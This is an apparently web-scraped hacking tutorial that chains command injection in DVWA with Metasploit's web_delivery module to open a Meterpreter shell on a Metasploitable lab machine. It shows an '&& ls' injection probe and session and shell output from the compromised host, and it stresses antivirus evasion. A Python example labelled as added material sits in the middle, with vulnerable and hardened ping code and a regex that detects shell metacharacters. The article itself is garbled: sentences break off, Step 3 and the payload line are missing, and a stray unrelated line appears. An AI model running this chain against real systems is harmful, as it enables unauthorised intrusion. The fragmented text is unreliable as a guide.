
How to Use Metasploit's Web Delivery Script & Command Injection to Pop a Shell «Zero Byte :: WonderHowTo



One of the best ways to improve your skills as a hacker is to learn different ways of combining attacks to achieve success. What did it mean to do a good job?

Today, we will use Kali Linux and Metasploit to attack DVWA, the vulnerable web application included in the Metasploitable 2 virtual machine.

Web Delivery Overview

server created on the attacking machine. The web delivery script runs once the target machine connects to the server, and the payload is then executed. It works with Python, PowerShell, and PHP applications.

The web delivery script's primary advantage is stealth. The server and payload are both hosted on the attacking machine, so when the exploit is carried out, nothing is written to disk on the target, making it less likely to trigger antivirus applications and other defenses.

The one caveat of this

Command Injection Primer

Command injection is a type of attack in which arbitrary operating system commands are executed on the host via a vulnerable web application. Usually, this occurs when an application passes unsafe user input from a form to the server, but this can happen with cookies, HTTP headers, and other sources of data.

This type of vulnerability is especially dangerous because of the intrinsic power of system commands: whatever the web server's user can run, the attacker can run.
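To make the primer concrete, here is an added example (not code from the original article and not DVWA's own source) that mirrors a "ping this address" form. It shows the vulnerable construction (user input concatenated into a shell string, so && is parsed by the shell), the hardened construction (an allow-list check with the ipaddress module, then an argv list passed with shell=False), and a small detector that scans web-server access-log lines for query parameters carrying shell metacharacters. The function names, the /exec/ path and the log lines are constructed for the example; the vulnerable builder only returns the string it would run and never executes it.

```python
"""Command injection in a 'ping' form: vulnerable vs. hardened construction,
plus a detector over sample access-log lines.

Added example for illustration; not the original article's or DVWA's code.
Function names, the /exec/ path and SAMPLE_LOG are constructed."""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit


def vulnerable_ping_command(user_input: str) -> str:
    """The flaw: the raw form value is glued into a shell command string.
    If it is later run with shell=True, /bin/sh sees '&&', ';', '|' etc.
    Returned rather than executed so the effect can be inspected safely."""
    return "ping -c 1 " + user_input


def is_valid_target(user_input: str) -> bool:
    """Allow-list check: the value must parse as exactly one IP address.
    Hostnames, surrounding whitespace and metacharacters all fail to parse."""
    try:
        ipaddress.ip_address(user_input)
    except ValueError:
        return False
    return True


def hardened_ping_argv(user_input: str) -> list:
    """Hardened construction: validate, then build an argv list. With
    shell=False no shell ever parses the value, so '&&' is just a bad IP."""
    if not is_valid_target(user_input):
        raise ValueError("target must be a single IP address")
    return ["ping", "-c", "1", user_input]


def run_hardened_ping(user_input: str) -> subprocess.CompletedProcess:
    """Execute the hardened form (shell=False). Not exercised by the tests."""
    return subprocess.run(hardened_ping_argv(user_input),
                          capture_output=True, text=True, timeout=10)


# Shell control operators an injected value would need: && || ; | ` $( newline
SHELL_META = re.compile(r"&&|\|\||\$\(|[;|`\n]")

# Combined-log-format prefix: client, identd, user, [time], "METHOD target ..." status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) [^"]*" (\d{3})')


def detect_injection_attempts(log_lines) -> list:
    """Flag requests whose query-string parameters contain shell
    metacharacters. Returns (client_ip, parameter_name, decoded_value)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, _status = m.groups()
        query = urlsplit(target).query
        # parse_qs percent-decodes, so %26%26 becomes '&&' before the check
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if SHELL_META.search(value):
                    hits.append((client, name, value))
    return hits


# Constructed access-log lines: one benign ping, two injection attempts, one unrelated hit
SAMPLE_LOG = [
    '172.16.1.100 - - [22/Oct/2018:11:10:01 -0500] "GET /exec/?ip=172.16.1.100&Submit=Submit HTTP/1.1" 200 1421',
    '172.16.1.100 - - [22/Oct/2018:11:11:17 -0500] "GET /exec/?ip=172.16.1.100%26%26ls&Submit=Submit HTTP/1.1" 200 1987',
    '172.16.1.100 - - [22/Oct/2018:11:12:03 -0500] "GET /exec/?ip=127.0.0.1%3Bid&Submit=Submit HTTP/1.1" 200 1504',
    '10.0.0.7 - - [22/Oct/2018:11:12:40 -0500] "GET /index.php HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    probe = "172.16.1.100 && ls"
    print("vulnerable would run:", vulnerable_ping_command(probe))
    print("hardened accepts it: ", is_valid_target(probe))
    print("hardened argv:       ", hardened_ping_argv("172.16.1.100"))
    for client, name, value in detect_injection_attempts(SAMPLE_LOG):
        print(f"suspicious request from {client}: {name}={value!r}")
```

The sample lines use GET so the parameter is visible in a standard access log; DVWA's form actually submits by POST, whose body is not logged by a default web-server configuration, so in practice the same check belongs in the application's own logging or in a WAF that sees request bodies. The detector also relies on the value being percent-encoded the way a browser submits it; a raw, unencoded && in a hand-crafted URL splits the query string instead, which is why rejecting the value at input time (is_valid_target) is the control that matters and log detection is the backstop.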

Step 1: Fire Up DVWA

The first thing we need to do is open DVWA and log in using the default credentials.

Next, browse to the "DVWA Security" tab and set the security level to "low" to make sure our exploit runs.

Step 2: Find a Vulnerable Entry Point

Now we can navigate to the "Command Execution" page. For this attack to work, we have to ensure that the target application can communicate with our local machine. We can take advantage of the default functionality of this page to ping our attacking machine.

After receiving a successful reply, the next thing we need to do is determine whether this page is vulnerable to command injection. We can do so by appending a command to the IP address. Here, we want to add the && symbol followed by ls and hit "submit" again.

Step 4: Run the Attack

We can use the command injection vulnerability that we discovered earlier as an easy means of attack. Copy the last line and append it to the IP address with && in the "Command Execution" page of DVWA, just as we did when testing whether the page was vulnerable in the first place.

If everything goes according to plan, once we hit "submit," our payload will execute and a Meterpreter session will open. Back in the terminal, we can see that this is exactly what happens.

msf exploit(multi/script/web_delivery) > [*] 172.16.1.102 web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:1234 -> 172.16.1.102:57343) at 2018-10-22 11:12:05 -0500

We are not automatically dropped into the session, though, so we can use the sessions command to view the active sessions that are open.

msf exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                     Connection
  --  ----  ----                   -----------                     ----------
  1         meterpreter php/linux  www-data (33) @ metasploitable  172.16.1.100:1234 -> 172.16.1.102:57343 (172.16.1.102)

To interact with an active session, use the sessions -i command followed by the appropriate session ID number.

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux

Now we can run Meterpreter commands like getuid and sysinfo to display information about the target machine. We can drop into a shell by using the shell command.

meterpreter > shell
Process 4869 created.
Channel 0 created.
whoami
www-data
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ps
  PID TTY          TIME CMD
 4656 ?        00:00:00 apache2
 4658 ?        00:00:00 apache2
 4661 ?        00:00:00 apache2
 4663 ?        00:00:00 apache2
 4665 ?        00:00:00 apache2
 4761 ?        00:00:00 apache2
 4793 ?        00:00:00 apache2
 4855 ?        00:00:00 php
 4856 ?        00:00:00 sh
 4858 ?        00:00:00 php
 4869 ?        00:00:00 sh
 4873 ?        00:00:00 ps

From here, we can issue commands like whoami to view the current user, uname -a to display operating system information, and ps to see a list of running processes.

Wrapping Up

In this tutorial, we learned a bit about command injection, Metasploit's web delivery script, and how to combine the two into an effective method of attack. Because nothing is written to disk on the target, this approach also increases the chances of evading antivirus solutions.

